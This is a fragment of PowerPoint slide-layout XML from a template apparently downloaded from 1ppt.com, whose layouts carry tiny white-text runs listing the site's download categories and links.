<file path=ppt/slideLayouts/_rels/slideLayout286.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860.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster286.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout287.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88.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89.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0.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91.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92.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93.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94.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95.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96.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97.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98.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99.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00.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01.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02.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03.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04.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05.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06.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07.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08.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09.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10.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11.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12.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13.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14.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15.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16.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17.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18.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19.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20.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21.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22.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23.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24.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25.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26.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27.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28.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29.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30.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31.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32.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33.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34.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35.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36.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37.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38.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39.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40.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41.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42.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43.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44.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45.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46.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47.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48.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49.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50.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51.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52.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53.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54.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55.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56.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57.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58.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59.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60.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61.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62.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63.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64.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65.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66.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67.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68.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69.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70.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71.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72.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73.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74.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75.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76.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77.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78.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79.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80.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81.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82.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83.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84.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85.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86.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87.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88.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89.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90.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91.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92.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93.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94.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95.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96.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97.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98.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99.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00.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01.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02.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03.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04.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05.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06.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07.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08.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09.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10.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11.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12.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13.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14.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15.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16.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17.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18.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19.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20.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21.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22.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23.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24.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25.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26.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27.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28.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29.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30.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31.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32.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33.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34.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35.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36.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37.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38.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39.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40.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41.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42.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43.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44.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45.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46.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47.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48.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49.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50.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51.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52.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53.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54.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55.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56.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57.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58.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59.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60.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61.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62.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63.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64.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65.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66.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67.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68.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69.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70.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71.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72.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73.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74.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75.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76.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77.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78.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79.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80.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81.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82.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83.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84.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85.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86.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87.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88.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89.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90.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91.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92.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93.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94.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95.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96.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97.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98.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99.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00.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01.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02.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03.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04.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05.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06.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07.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08.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09.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10.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11.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12.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13.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14.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15.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16.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17.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18.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19.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20.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21.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22.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23.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24.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25.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26.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27.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28.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29.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30.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31.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32.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33.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34.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35.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36.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37.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38.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39.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40.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41.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42.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43.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44.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45.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46.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47.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48.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49.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50.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51.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52.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53.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54.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55.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56.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57.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58.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59.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60.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61.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62.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63.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64.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65.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66.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67.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68.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69.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70.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71.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572.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573.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574.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575.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576.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577.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578.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579.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80.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581.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582.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583.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584.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585.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586.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587.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588.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589.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90.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591.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592.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593.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594.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595.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596.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597.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598.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599.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00.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01.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02.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03.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04.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05.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06.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07.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08.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09.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10.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11.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12.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13.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14.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15.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16.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17.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18.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19.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20.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21.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22.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23.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24.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25.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26.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27.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28.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29.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30.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31.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32.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33.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34.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35.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36.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37.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38.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39.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40.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41.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42.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43.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44.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45.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46.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47.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48.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49.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50.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51.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652.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653.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654.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655.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656.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657.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658.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659.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60.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661.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662.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663.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664.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665.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666.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667.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668.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669.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70.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671.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72.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73.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74.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75.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76.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77.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78.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79.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80.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81.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682.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683.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684.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685.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686.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687.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688.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689.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90.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691.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692.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693.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694.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695.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696.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697.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698.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699.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00.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01.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02.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03.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04.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05.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06.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07.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08.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09.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10.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11.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12.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13.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14.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15.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16.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17.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18.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19.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20.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21.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22.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23.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24.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25.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26.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27.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28.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29.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30.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31.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732.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733.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734.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735.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736.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737.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738.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739.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40.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741.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742.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743.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744.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745.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746.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747.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748.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749.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50.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751.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752.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753.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754.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755.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756.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757.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758.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759.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60.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761.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762.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763.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764.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765.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766.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767.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768.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769.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70.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771.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772.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773.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774.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775.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776.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777.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778.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779.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80.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781.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782.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783.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784.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785.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786.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787.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788.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789.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90.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791.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792.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793.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794.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795.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796.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797.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798.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799.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00.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01.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02.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03.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04.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05.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06.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07.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08.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09.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10.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11.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12.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13.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14.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15.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16.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17.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18.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19.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20.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21.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822.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823.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824.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825.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826.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827.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828.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829.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30.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831.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832.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833.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834.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835.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836.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837.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838.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839.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40.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841.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842.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843.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844.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845.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846.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847.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848.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849.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50.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851.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852.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853.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854.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855.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856.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857.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858.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859.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60.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861.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862.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863.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864.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865.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866.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867.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868.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869.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70.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871.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872.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873.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874.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875.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876.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877.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878.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879.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80.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881.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882.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883.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884.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885.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886.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887.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888.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889.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90.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891.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892.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893.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894.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895.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896.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897.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898.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899.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00.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901.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02.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03.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04.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05.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06.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07.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08.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09.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10.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11.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912.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913.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914.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915.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916.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917.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918.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919.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20.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921.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922.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923.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924.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925.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926.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927.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928.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929.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30.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931.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932.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933.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934.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935.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936.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937.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938.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939.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40.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941.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942.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943.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944.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945.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946.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947.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948.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949.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50.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951.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952.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953.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954.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955.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956.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957.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958.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959.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60.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961.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962.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963.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964.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965.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966.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967.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968.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969.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70.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971.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972.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973.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974.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975.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976.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977.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978.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979.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80.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981.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982.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983.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984.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985.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986.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987.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988.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989.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90.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991.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992.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993.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994.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995.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996.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997.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998.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999.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0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00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00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00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00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00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00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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout100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00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00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00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0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01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01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01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01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01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01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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout101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01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01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01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0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02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02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02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02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02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02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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
